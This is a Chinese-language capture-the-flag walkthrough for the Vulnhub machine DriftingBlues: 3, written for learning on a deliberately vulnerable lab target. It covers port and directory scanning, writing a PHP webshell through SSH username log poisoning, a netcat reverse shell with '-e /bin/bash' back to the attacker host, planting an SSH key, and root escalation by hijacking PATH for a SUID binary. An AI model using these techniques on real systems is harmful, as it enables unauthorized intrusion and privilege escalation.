[Vulnhub靶机] DriftingBlues: 3
[Vulnhub靶机] DriftingBlues: 3靶机渗透思路及方法(个人分享)
靶机下载地址:
https://download.vulnhub.com/driftingblues/driftingblues3.ova
靶机地址:192.168.67.19
攻击机地址:192.168.67.3
一、信息收集
1.使用 arp-scan?命令扫描网段内存活的主机,以获取靶机ip地址
arp-scan -I?指定网卡 -l
2.使用?nmap?工具扫描靶机开放端口、服务版本以及系统版本,得到开放端口22、80及其服务ssh、http
nmap -sV -O?靶机地址
? ? ? ? -sV? ? ? ? 探测主机服务版本
? ? ? ? -O? ? ? ? ?识别主机操作系统
3.访问web网页,没有发现有用信息,尝试使用?dirsearch?工具扫描靶机网站目录,得到robots.txt
dirsearch -u?靶机URL
? ? ? ? -u????????指定目标URL
4.访问靶机 robots.txt 页面,得到 /eventadmins?页面
5.继续访问 /eventadmins ,得到提示。提示中说明ssh可能存在漏洞,还得到了?/littlequeenofspades.html 页面
6.继续访问?/littlequeenofspades.html ,发现页面没有有用信息回显,查看网页源代码得到一串base64加密的内容
7.通过两次base64解密后得到 /adminsfixit.php,查看后发现该文件为ssh身份验证日志文件
二、漏洞利用
分析ssh日志文件后发现,ssh远程连接时登录的用户名会被写入到该文件内,尝试利用该漏洞将一句话木马写入到?/adminsfixit.php内
重新访问?/adminsfixit.php 网页,并通过cmd参数进行测试,发现成功写入
三、反弹shell
1.进行反向反弹shell,攻击机开启?nc?监听
nc -lvp?监听端口号?靶机地址
? ? ? ? -l? ? ? ? ?????开启监听
? ? ? ? -v? ? ? ? ????显示详细输出
? ? ? ? -p? ? ? ? ? ? 指定监听端口
2.利用木马执行?nc 命令,尝试反弹shell
nc?攻击机地址?监听端口号 -e /bin/bash
? ? ? ? -e? ? ? ? 指定对应的应用程序
3.成功反弹shell,进入靶机并成功执行命令
4.利用python中pty模块的创建交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
? ? ? ? -c? ? ? ? 在命令行中调用python代码
pty.spawn()?函数是pty模块中的一个函数,用于创建一个子进程,并将其连接到一个伪终端。通过这个伪终端,我们可以与子进程进行交互,就像在控制台上一样。
5.分析查看靶机内文件,发现home目录下有一个robertj用户,且该用户目录下存在两个文件,user.txt”文件没有权限无法打开,.ssh?目录有可读可写可执行权限
6.进入?.ssh?目录进行查看,发现目录内没有任何文件内容
7.继续查看分析,查看ssh配置文件(默认目录/etc/ssh/sshd_config),发现可以公钥登录,并且给出了公钥文件存放目录?/home/robertj/.ssh/authorized_keys
8.尝试把公钥放入.ssh目录内,使用?ssh-keygen?工具生成公密钥,并将生成的密钥保存到 /home/robertj/.ssh/ 目录下
ssh-keygen -t?rsa
? ? ? ? -t? ? ? ? 指定生成的密钥类型,默认为RSA类型
9.将生成的公钥内容输出到authorized_keys文件内
10.查看私钥文件,将内容复制出来,粘贴到本地文件中
注意要将id_rsa文件的权限修改为与创建时权限一致
11.使用私钥进行登录,成功登录robertj用户
ssh?robertj@192.168.66.140 -i?id_rsa
? ? ? ? -i? ? ? ? 指定身份验证文件,用于身份验证
四、提权
1.使用?find?命令寻找suid程序,发现一个可疑程序/usr/bin/getinfo
find / -perm -4000 2>/dev/null 或?find / -perm -u=s?2>/dev/null
? ? ? ? -perm? ? ? ? ?按照权限查找文件(4000、2000、1000分别表示SUID,SGID,SBIT权限,如777为普通文件最高权限,7000为特殊文件的最高权限)
使用find命令的时候在命令后加 2>/dev/null?将错误结果输出重定向到/dev/null中,/dev/null是一个特殊的设备文件,其实质为空设备文件,其大小是0字节,所有人都有读写权限,而其主要作用就是将接收的一切输出给它的数据并丢弃,就像垃圾桶,也被称为位桶(bit bucket)
2.执行该程序,根据执行结果发现分别运行了ip addr、cat /etc/hosts、uname -a命令
3.可以通过修改环境来进行命令劫持提权
通过修改环境变量让getinfo在调用命令调用到我们伪造的ip命令(在检索环境时会先调用最前面的环境也就是最新写入的环境),来达到提权的效果
export?PATH=/tmp/:$PATH? ? ? ? ? ? ?把/tmp路径写入到系统路径中
cd /tmp
echo '/bin/bash'?> ip???????????????????????把/bin/bash写入到ip文件中(相当于创建ip并写入/bin/bash)
chmod?+x?ip? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??给ip文件增加执行权限
4.再次运行getinfo,成功提权至root权限
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!